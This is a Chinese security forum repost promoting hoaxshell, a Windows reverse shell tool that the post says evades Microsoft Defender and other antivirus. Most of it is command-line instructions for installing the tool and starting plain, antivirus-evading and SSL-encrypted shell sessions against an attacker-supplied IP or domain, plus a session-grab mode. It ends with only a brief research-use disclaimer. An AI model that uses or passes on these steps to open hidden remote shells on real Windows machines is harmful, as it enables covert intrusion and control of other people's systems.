安全矩阵

 找回密码
 立即注册
搜索
查看: 1135|回复: 0

Windows反向shell -- hoaxshell

[复制链接]

181

主题

182

帖子

721

积分

高级会员

Rank: 4

积分
721
发表于 2022-9-6 23:07:39 | 显示全部楼层 |阅读模式
本帖最后由 wangqiang 于 2022-9-6 23:11 编辑


Windows反向shell -- hoaxshell
t3l3machus web安全工具库
2022-09-06 00:00 发表于河南
转载自:Windows反向shell -- hoaxshell


项目作者:t3l3machus
项目地址:https://github.com/t3l3machus/hoaxshell

0x01 工具介绍
hoaxshell 是一种非常规的 Windows 反向 shell,目前未被 Microsoft Defender 和可能的其他 AV 解决方案检测到,因为它完全
基于 http(s) 流量。该工具易于使用,它生成自己的 PowerShell 有效负载并支持加密 (ssl)。


0x02 安装与使用
1、安装需要的库文件
  1. git clone https://github.com/t3l3machus/hoaxshell
  2. cd ./hoaxshell
  3. sudo pip3 install -r requirements.txt
  4. chmod +x hoaxshell.py
复制代码
2、通过 http 的基本 shell 会话
  1. sudo python3 hoaxshell.py -s <your_ip>
复制代码
3、避免检测的推荐用法(通过 http)
  1. sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization"
复制代码
4、加密的 shell 会话 (https)
  1. # Generate self-signed certificate:
  2. openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

  3. # Pass the cert.pem and key.pem as arguments:
  4. sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>
复制代码

5、具有可信证书的加密 shell 会话
  1. sudo python3 hoaxshell.py -s <your.domain.com> -t -c </path/to/cert.pem> -k <path/to/key
复制代码
6、抓取会话模式
  1. sudo python3 hoaxshell.py -s <your_ip> -g
复制代码

0x03 下载地址
1、通过项目地址下载
2、关注web安全工具库公众号,后台回复:20220906

0x04 声明
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 17:21 , Processed in 0.018524 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表